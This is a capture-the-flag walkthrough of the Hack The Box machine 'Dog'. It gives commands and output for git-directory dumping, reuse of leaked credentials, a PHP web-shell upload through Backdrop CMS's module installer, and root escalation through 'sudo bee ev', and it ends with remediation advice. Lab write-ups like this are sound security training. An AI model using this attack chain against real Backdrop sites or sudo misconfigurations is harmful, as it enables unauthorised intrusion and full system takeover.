HackTheBox Dog Walkthrough - Pentest Lab Notes
πΆ Hack The Box | Dog - Walkthrough
This walkthrough details the steps taken to fully compromise the Dog machine on Hack The Box.
β Status:
Pwned
π HTB Link: https://app.hackthebox.com/machines/651
π― Difficulty: Easy
π§ Skills: Web Exploitation, Enumeration, Privilege Escalation
π Enumeration & Initial Access
π Network Scanning
Initial Nmap scan to discover open ports and services:
1
nmap -sV -sC -oN nmap/initial.nmap 10.10.11.58
Results:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Port 22: OpenSSH
Port 80: Apache with a robots.txt revealing multiple sensitive paths.
π Web Enumeration
Target website runs Backdrop CMS.
A .git directory was found and dumped using:
1
git-dumper http://10.10.11.58/.git ./git-dump/
After 8 hours of Enumrations Found credentials in settings.php:
1
$database = 'mysql://root:BackDrop...@127.0.0.1/backdrop';
Discovered user email: tiffany@dog.htb
π CMS Admin Panel Access
Tried credentials: tiffany:BackDropJ2024DS2024 β Success!
Logged into Backdrop CMS Admin Panel.
π₯ Exploiting Backdrop CMS
Backdrop CMS v1.21.0 has a known vulnerability (Exploit-DB #52021).
1
2
3
Created a malicious .tar file containing a PHP web shell.
Uploaded it via:
http://10.10.11.58/?q=admin/installer/manual
Accessed shell at:
1
http://10.10.11.58/modules/shell/shell.php
π Gaining Shell Access
1
2
3
From the shell, enumerated users via /etc/passwd.
Found user: johncusack.
Tried SSH login:
1
ssh johncusack@10.10.11.58
Password: BackDropβ¦
User Shell Acquired!
id
uid=1001(johncusack) gid=1001(johncusack) groups=1001(johncusack)
π― User flag located at:
1
/home/johncusack/user.txt
π Privilege Escalation π Sudo Permissions
Check with:
1
sudo -l
Result:
User johncusack may run the following commands on dog: (ALL : ALL) /usr/local/bin/bee
π Abusing bee Utility
bee is a CLI tool for Backdrop CMS.
It supports an eval option that can run arbitrary PHP as root.
Exploit:
1
sudo /usr/local/bin/bee ev "system('id')"
Output:
uid=0(root) gid=0(root) groups=0(root)
π― Root shell acquired!
π Flags
1
2
3
β
user.txt: /home/johncusack/user.txt
β
root.txt: /root/root.txt
π§―Remediation Recommendations
1
2
3
4
5
6
7
8
9
Restrict access to .git directories.
Remove sensitive backups or hidden directories.
Avoid hardcoding credentials.
Carefully review and limit sudo permissions.
Update vulnerable CMS software.
π Summary Step Action Initial Foothold Backdrop CMS admin login via reused creds Shell Access Upload PHP shell through CMS module installer Lateral Movement SSH as johncusack with found creds Privilege Escalation Abused sudo bee to run PHP as root